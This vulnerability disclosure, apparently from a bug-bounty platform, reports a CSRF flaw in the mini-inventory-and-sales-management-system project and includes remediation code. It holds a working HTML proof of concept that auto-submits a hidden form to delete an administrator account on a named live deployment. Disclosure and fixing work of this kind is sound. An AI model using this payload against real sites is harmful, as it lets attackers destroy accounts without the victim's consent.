Cross-Site Request Forgery (CSRF) in amirsanni/mini-inventory-and-sales-management-system
Valid
Reported on
Sep 7th 2021
✍️ Description
An attacker is able to delete administrator accounts if a logged-in user visits the attacker's website.
🕵️♂️ Proof of Concept
1. While logged in, open this POC.html in a browser (Firefox or Safari).
2. Observe that an administrator account has been deleted without your intent.
//POC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators/delete" method="POST">
<input type="hidden" name="_aId" value="396" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
💥 Impact
This vulnerability allows an attacker to forge a request on behalf of an administrator and have an account deleted without the administrator's intent.
💥 Test
Tested on Firefox and Safari.
💥 Fix
A CSRF token should be required on this request.
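As an added illustration of that fix (example code written for this report, not the project's own code): a minimal delete handler that issues a per-session token, rejects the PoC's token-less POST, and additionally checks the Origin header. The site origin and the `_aId` value come from the PoC above; the attacker origin and the in-memory session store are constructed for the example.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

SITE_ORIGIN = "https://1410inc.xyz"   # origin of the deployment named in the PoC
SESSIONS = {}                         # constructed in-memory session store: sid -> data

def new_session():
    """Create a logged-in session with its own unguessable CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid

def csrf_token_for(sid):
    """Token the server embeds in its own delete form as a hidden field."""
    return SESSIONS[sid]["csrf_token"]

def handle_delete(request):
    """Hardened /administrators/delete handler. request is a dict holding
    method, cookies, headers and the raw urlencoded body; returns (status, reason)."""
    if request["method"] != "POST":
        return 405, "method not allowed"
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "not logged in"
    fields = parse_qs(request["body"])
    submitted = fields.get("csrf_token", [""])[0]
    # The attacker's page cannot read the victim's token, so it cannot include
    # it. Compare in constant time so timing does not leak the token.
    if not submitted or not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "missing or invalid CSRF token"
    # Defence in depth: browsers attach Origin to cross-site POSTs and a page
    # cannot override it, so a foreign Origin is rejected even with a token.
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    return 200, "deleted administrator " + fields.get("_aId", [""])[0]

def forged_request(sid):
    """What the PoC form produces: the browser adds the victim's session cookie
    and the attacker's Origin, but the body carries no token."""
    return {"method": "POST", "cookies": {"session": sid},
            "headers": {"Origin": "https://attacker.example"},  # constructed origin
            "body": urlencode({"_aId": "396"})}

def legitimate_request(sid):
    """Submission of the application's own form, which carries the token."""
    return {"method": "POST", "cookies": {"session": sid},
            "headers": {"Origin": SITE_ORIGIN},
            "body": urlencode({"_aId": "396", "csrf_token": csrf_token_for(sid)})}
```

Running `handle_delete(forged_request(sid))` returns `(403, 'missing or invalid CSRF token')`, while the legitimate submission returns `(200, 'deleted administrator 396')`.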
We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back.